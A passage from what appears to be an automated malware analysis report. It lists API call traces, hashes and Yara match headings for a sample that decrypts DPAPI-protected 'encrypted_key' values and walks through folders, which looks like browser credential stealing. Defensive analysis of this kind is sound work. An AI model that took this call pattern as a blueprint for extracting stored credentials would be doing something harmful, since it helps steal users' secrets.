                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                    • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                    • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                    • Part of subcall function 00FB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                    • Part of subcall function 00FB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                    • Part of subcall function 00FB9B60: LocalFree.KERNEL32(?), ref: 00FB9BD3
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 894e52a534e6c83e28f5d85f0dcbf932e2b49e9cbf2cdc1f5bbad39584d38715
                  • Instruction ID: a4ee0ddb2c4dca844732213f9a6c7d159e4aecbd63fad215f5af9e9b3d9381e8
                  • Opcode Fuzzy Hash: 894e52a534e6c83e28f5d85f0dcbf932e2b49e9cbf2cdc1f5bbad39584d38715
                  • Instruction Fuzzy Hash: E3317EB6D00209ABCF04DBE5DC86EEEB7B8BF48304F144519EA01A3241EB749A04DBA1
                  APIs
                  • CreateFileA.KERNEL32(00FC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FC3AEE,?), ref: 00FC92FC
                  • GetFileSizeEx.KERNEL32(000000FF,00FC3AEE), ref: 00FC9319
                  • CloseHandle.KERNEL32(000000FF), ref: 00FC9327
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                  • Instruction ID: 434f8857262482add88784a44beb2b3318054ad78dc63fc63b7dfa9eb5fe76f3
                  • Opcode Fuzzy Hash: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                  • Instruction Fuzzy Hash: A8F0A435E04204BBDB24DFB0ED49F9E77F9AB48320F10C658B615A71C4D7B5A6419F40
                  APIs
                  • __getptd.LIBCMT ref: 00FCC74E
                    • Part of subcall function 00FCBF9F: __amsg_exit.LIBCMT ref: 00FCBFAF
                  • __getptd.LIBCMT ref: 00FCC765
                  • __amsg_exit.LIBCMT ref: 00FCC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00FCC797
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                  • Instruction ID: e44d59ee04860fd7b8ef20eaa497dcf880ee81561addbb3592c7221c4490ee5d
                  • Opcode Fuzzy Hash: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                  • Instruction Fuzzy Hash: F0F06D36D052079BDB21BFB85E07F5D37A0AF00724F25414DF418A62D2DB685940FE96
                  APIs
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4F7A
                  • lstrcat.KERNEL32(?,00FD1070), ref: 00FC4F97
                  • lstrcat.KERNEL32(?,00C89258), ref: 00FC4FAB
                  • lstrcat.KERNEL32(?,00FD1074), ref: 00FC4FBD
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                    • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                    • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                    • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                  • Instruction ID: a01b349b13e2008086b99d12f77d1b03e12d7afa07ba86e3118ab4a7ac174515
                  • Opcode Fuzzy Hash: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                  • Instruction Fuzzy Hash: C521A47690020867C768FBA0EC46FE9333CAB54700F00455CB65D97185EEBCAAC99BA2